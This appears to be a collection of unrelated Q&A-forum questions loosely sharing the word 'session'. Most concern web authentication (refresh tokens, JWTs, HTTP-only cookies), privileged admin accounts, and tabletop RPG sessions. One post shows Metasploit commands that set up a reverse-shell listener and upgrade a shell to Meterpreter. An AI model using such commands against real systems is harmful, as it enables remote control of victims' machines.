Authentication in Next.js application (SSR SPA with long sessions)

We’re currently developing a Next.js application (server side rendering) and are looking for secure ways to keep the users logged in for longer periods of time.

AFAIK this can either be done using silent authentication or refresh tokens. General note: When a user is not logged in yet, we can redirect the user to a login page. If the user enters their credentials, we use the Authorisation Code Grant (to my knowledge PKCE is not needed in this case as it’s all server side during these steps) that will redirect back and respond with an authorisation code. We can then exchange this authorisation code with an access token (and refresh token) using a client secret (all server side).

Refresh Tokens

Since any client side storage (local storage, cookies, etc.) is not safe (XSS attacks) for storing any kind of tokens (especially refresh tokens), we are wondering if it’s generally safe to store a refresh token (and access token) in an HTTP-only cookie considering that…

  • … the token values are encrypted, e.g. AES, with a secret that is not exposed to the client side.
  • … the refresh tokens are rotating, so when you retrieve a new access token with your refresh token, you also receive a new refresh token. The old refresh token is invalidated and if used again, all refresh tokens are invalidated.
  • … the refresh token automatically expires after a couple of days, e.g. 7 days.

Silent Authentication

A possible alternative could be silent authentication via an auth request on the server side (prompt=none). The auth session for the silent authentication would also be stored in an HTTP-only cookie.

In both scenarios, it’s probably necessary to make sure that the client doesn’t know about any of these tokens (you could potentially use silent authentication on the client side using an iframe (the domain is the same, just different subdomains), but the client would then potentially receive a new access token which has to be stored in memory (potential XSS vulnerability)).

Since it’s a server side rendered SPA, the client side still needs to be able to get new data from the API server using the access token. For this, we were thinking of using Next.js API routes as a proxy: so, if the client wants to get new data, it will send an AJAX request to the respective Next.js API route. The controller for this Next.js API route is able to read and decrypt the HTTP-only cookie and can therefore send the request to the API server with a valid access token in the HTTP header. Just before the short-lived access token expires, the controller would need to first send a request to the auth server to retrieve a new access (and refresh) token and then continue sending the request with the new access token to the API server.

While this sounds good and feasible in theory, we are wondering about the following points:

  1.) Is it generally safe to save a (rotating) refresh and access token in an HTTP-only cookie? Does the cookie value need to be encrypted, or is that unnecessary? Does a rotating refresh token offer any additional security in this case?
  2.) Is the “Next.js API route as a proxy” method a secure way to make sure that the client side can get new data from the API server? If e.g. would try to send a request to the (“unprotected”) Next.js API route, it would not respond with any data as it’s a different domain and the HTTP-only cookies are therefore not accessible, correct? Is CSRF possible for these Next.js API routes?
  3.) Is it safe if the HTTP-only cookie for the refresh token is shared across all subdomains and not tied to one specific subdomain (application)? This would allow us to access the cookie from e.g. the actual website or other subdomains.
  4.) Is the refresh token approach better / safer than the silent authentication approach?

Follow-up question: Can the refresh token approach also be used to authenticate users in a browser extension? So:

  1.) The user logs in (Authorisation Code Grant with PKCE): the login prompt/page is shown in a popup (or new tab) and the communication (authorisation code) is done through postMessage.
  2.) The background script receives the authorisation code and exchanges it for an access token and rotating refresh token (which is probably necessary in this flow (?)) using the code and a code verifier. These tokens can then be saved in Chrome storage. We can potentially also encrypt the tokens, but I’m not sure if that offers any additional protection (?) considering that the background script is not the same as a server.
  3.) If the Chrome extension wants to receive data from the API server, it sends a message to the background script, which will then send the API request using the tokens saved in Chrome storage.

Metasploit: Issue with upgrading a low privilege shell (sessions -u)

Setup info: I don’t believe this is the issue as I regularly update my system. I’ll add one piece of information as an example. If you would really like the rest then I can add more in later.

metasploit v5.0.89-dev

Payload: I used a custom Python script to create a reverse shell from the victim’s computer to the attacker. No problem with the low priv shell in netcat or Metasploit. If anyone wants to take a look at the script I can upload it to GitHub and share the link (though it’s nothing special, I’d prefer to send the link privately to keep the script spread as little as possible).

Exact Steps I took:

    msf5 > use multi/handler
    msf5 exploit(multi/handler) > set payload windows/x64/shell_reverse_tcp
    payload => windows/x64/shell_reverse_tcp
    msf5 exploit(multi/handler) > set LPORT 549
    LPORT => 443
    msf5 exploit(multi/handler) > set LHOST
    LHOST =>
    msf5 exploit(multi/handler) > run
    [*] Started reverse TCP handler on
    [*] Command shell session 1 opened ( -> at 2020-05-30 22:31:25 -0400
    Login: password
    You have a shell have fun
    #> background
    Background session 1? [y/N]  y
    msf5 exploit(multi/handler) > sessions -u 1
    [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

The Issue:

    [*] Upgrading session ID: 1
    [*] Starting exploit/multi/handler
    [*] Started reverse TCP handler on
    [-] Post failed: NoMethodError undefined method `reverse!' for nil:NilClass
    [-] Call stack:
    [-]   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:136:in `shell_command_token_win32'
    [-]   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:84:in `shell_command_token'
    [-]   /usr/share/metasploit-framework/lib/msf/core/post/common.rb:147:in `cmd_exec'
    [-]   /usr/share/metasploit-framework/lib/msf/core/post/windows/powershell.rb:32:in `have_powershell?'
    [-]   /usr/share/metasploit-framework/modules/post/multi/manage/shell_to_meterpreter.rb:161:in `run'

Note: I have taken a look at some of the files, but they seem to be coded in Ruby (something I am not familiar with) and the error seems to be related to multiple files, so I have no clue how to really debug this. There also seem to be similar issues posted on GitHub, if it helps.

Are JWT still not recommended for sessions?

It seems there is a large divide as to whether or not you should have JWT or Session ID for managing user sessions on a WebApp/API (for a web front end and/or a mobile app).

It seems that the consensus goes to not using JWT (1,2,3,4) and to keep on using cookies, but I’ve seen more and more tutorials and people using JWT by default.

Even OWASP now uses JWT as session token instead of cookies (it is stored in the authorisation header/cookies and not in local storage obviously… but that’s not a hard task).

I’m trying to look at it neutrally and they seem to fit my usage:

  • session ids also have an expiration date that can be long or short, so I fail to see how it is an argument.
  • session ids are persisted in the backend, so having a blacklist for JWT doesn’t seem to be a “worse” solution
  • implementations are of the same level of complexity.

While with JWT I can:

  • store data inside the cookie, which is a nice feature to have (for roles, for example)
  • fail my queries early if the token is in the blacklist / if the data stored in the token is not validated (i.e. trying to access a route where your role, stored in the JWT, shouldn’t have access)
  • be stateless on some routes, if needed / possible / less security required (no blacklist).
  • use them as one time tokens for download

Is it still not recommended to use them as sessions? Are there security issues I’m not aware of? Both could work for my use case, but JWT would allow me to do more and currently I’m leaning towards using sessions “just because” of the consensus.

Where can I find transcripts of actual game sessions?

Some of us are getting together to play an RPG, but not everyone has been in one before. One of the prospective players has asked me for a transcript or something they could read to get a sense of what actually goes on in a game. I’d point them to a podcast, as in Where can I find actual play podcasts for RPGs?, but I’d like to read it myself first (and I can’t listen to podcasts), so:

Where can I find written transcripts of actual game sessions?

I’m basically looking for a script like:

    John (Thograk the Orc): I dig through the pile of dead rats.
    Susie (Minzen the Paladin): Eww, that's gross!  Why did we invite this orc again?
    Frank (DM): Some of the rats look tastier than others, but no, you don't find
        the Barrel of Healing buried in the pile.

but from an actual game.

In memory JWT for API auth with HTTP-only cookie for sessions?

I’ve spent a while reading about this, and I know it’s a common topic, but I was hoping to get some feedback on my authentication approach.

I have an SPA. It needs to authenticate to 1) my application backend and 2) some APIs on AWS. I’m using Cognito to authenticate user credentials.

My idea on approaching this is as follows:

  1. User authenticates via AWS Cognito API
  2. Receives JWT
  3. Keeps JWT in memory only (no local storage — XSS)
  4. Passes JWT to application backend
  5. Backend sets HTTP-only secure cookie on the client, STORING the JWT inside this cookie.
  6. Cookie is used to maintain sessions with the app backend
  7. In-memory JWT is used to authenticate with AWS APIs

This is fine and dandy, but when the user closes the browser or switches tabs, they won’t have the JWT in memory. However, they’ll still have the session cookie. So my thought is that it will ask the application server for the JWT (inside the cookie) before hitting the AWS APIs.

In this fashion, I have a secure HTTP-only cookie that maintains sessions with my app server, and I also have the JWT to authenticate with the AWS APIs. If the user has a valid session cookie, it means they should be allowed to have the JWT contained within it.

My only concern with this is that it seems a little circular. JWT authenticates to receive cookie, which authenticates in the future to receive a refreshed JWT. Otherwise, I think it seems pretty solid.


Can you use a “History” check to remind players of events from previous sessions or their backstory?

My players and I are starting a new campaign soon, with brand new characters set in the same world and after all of our previous campaigns. In the first session, I plan on having them run into some cultists that the players (but not the characters) have encountered in a previous campaign. One of the new characters was a student of one of the old characters, and it is mentioned in their backstory that “he showed me a museum of his previous adventures.” Would a History check be used to determine if this new character identifies the cultists from the museum?

More generally, what’s the time limit on a History check? Can they roll a history check to see if they remember things from the previous session? From their backstory? Or is it explicitly past events they did not experience? If this is the case, then what sort of check would I use for more recent history, like a “memory” check? Straight Wisdom, Investigation, straight Intelligence, Perception?

Best practices or advice to convince IT admins not to map network drives in privileged sessions with users

We are currently trying to enhance the security posture of our company, and this means changing how some IT personnel work.

Precisely, our IT helpdesk now has 2 separate accounts: 1 for normal day to day usage (email, internet, etc.), and 1 for administrative tasks. The latter is a privileged account having several rights on the AD and some servers.

The way they work is not very secure when it comes to supporting the users: they use their privileged account to login to the user’s workstation and perform tasks where admin rights are needed.

But my question is more accurately related to network drives being mapped in their privileged account’s profile. They insisted on using the same logon script as with their standard account.

Do you have any recommendations, references to guidelines and/or best practices in such a case? I’d like to present them some resources to convince them it’s not secure to have network drives mapped in this profile.

I tried to explain to them that if they log in to a ‘contaminated’ workstation, their privileges might spread the infection to the network… But they did not understand and argued they need to access some files on the network while assisting the users. They don’t want to waste time typing UNC paths, etc.

Should I Record our online D&D Sessions?

Context: My D&D group, this past year, has made the transition from AD&D to 5e. This has been helpful for a number of things, but particularly for taking full advantage of modern resources like Roll20. We switched to the virtual tabletop when meeting in person regularly became increasingly difficult. Now we are able to meet bi-weekly, despite living in a few different states across the US.

One of those modern resources I’ve personally been hung up on, however, is recording. I’m the resident DM of my group, and although we occasionally have other campaigns, mine is the go-to. We probably stayed with AD&D so long because it was what I knew, and I am admittedly a bit of a traditionalist. Change has been good thus far!

Still, I favour note-taking a great deal. I like the engagement it creates, and that it creates a way for my players to refer to things they should know in-character despite perhaps having forgotten details over the weeks. I have a pretty solid grip on what goes on in my sessions, but it also lets my players catch something that maybe I have missed that they deem important, and want to investigate, despite my forgetting it.

On the other hand, I have found a resource that would allow me to simply record everything that happened in our roughly 4-5 hour sessions, and play it back perfectly as it was. This is fantastic! I have toyed around with it (GeForce Experience is the overlay) and used it already to create instant replays of boss fights, or something funny that transpired.

There are a few reasons I see recording as particularly helpful:

  • It gives a “frozen-in-amber” snapshot of a session, which can be great for memories

  • it makes it easy for us to go back and check exactly what happened

  • it provides a way to let others watch what they missed in a session if they have to leave, or can’t make it

  • It could be a substitute for note-taking, so players can focus on the now and worry about notes later

  • my players could record the sessions anyway without my knowing, if they wanted their own recordings, so even if I personally don’t record they may still happen (I trust my players, but feel this is a valid point for anyone having this debate)

  • even with a recording, you capture everything, not merely the points you deem important. This may require note-taking anyway, because you can’t look at an mp4 file and know at-a-glance what you feel the important things that happened were

  • importantly, many of my players do not favour taking notes anyway, and their opinion is as valid as mine here

I have my concerns:

  • it could discourage note-taking, something that shows a willful intention to be engaged. I worry having recordings of exactly what happened may create less of a drive for this engagement, and I shouldn’t be punishing the players who are trying harder to stay on top of what is going on in the campaign

  • this program shows exactly what is happening on my screen, so players would see my notes (there are workarounds such as ripping out the video, which isn’t ideal but possible. Having another player record, which is less consistent. Keeping my notes on another monitor, which only partly works with Roll20–some info kept from them is inevitably visible on my end of the tabletop)

  • I like the traditional feeling of D&D, where everyone gets together, has a fun time, and is free to act how they want. I worry that with a recording, there will be less authenticity to that spontaneity. This could be good or bad–players may consider their wording more, their actions may be more deliberated over–but that might take away from some of the freedom that comes with playing with a group of close friends, not worrying about whoever else would hear you in the recording. (I have some shy roleplayers)

This last point is probably the trickiest. The simplest solution would be to ask my players, but while the player in my group who DMs second-most intends to record his next campaign, the rest haven’t shared a strong opinion. I am familiar with the research that says people perform better when they’re recorded, and that’s fine, but I don’t want anything to feel forced. Authenticity is important to me.

A disclaimer: I have not watched any D&D podcasts, so this has not influenced my opinion for better-or-worse. I also suspect that playing for an audience deliberately is its own matter, and should be addressed in its own breadth. I would consider it off-topic for my question, where we have no intention at present of sharing these recordings beyond our group. I merely mention people may be shy or conscientious because there is a “camera” at all.

For those of you who have tried recording either in-person meets, or sessions held over virtual tabletops with programs to record your sessions, how do you feel it has affected your campaign and your players? Are my concerns valid, or am I stuck in the past?